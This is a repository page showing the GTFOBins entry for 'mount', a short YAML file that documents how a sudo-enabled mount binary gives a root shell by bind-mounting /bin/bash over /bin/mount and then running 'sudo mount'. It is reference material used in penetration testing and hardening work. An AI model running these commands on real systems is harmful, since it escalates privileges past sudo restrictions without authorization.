GTFOBins.github.io/_gtfobins/mount.md

9 lines
190 B
Markdown
Raw Normal View History

2018-07-16 08:00:14 +00:00
---
functions:
sudo-enabled:
- description: bind mount bash to the mount binary, as mount is sudo enabled.
code: |
sudo mount -o bind /bin/bash /bin/mount
sudo mount
---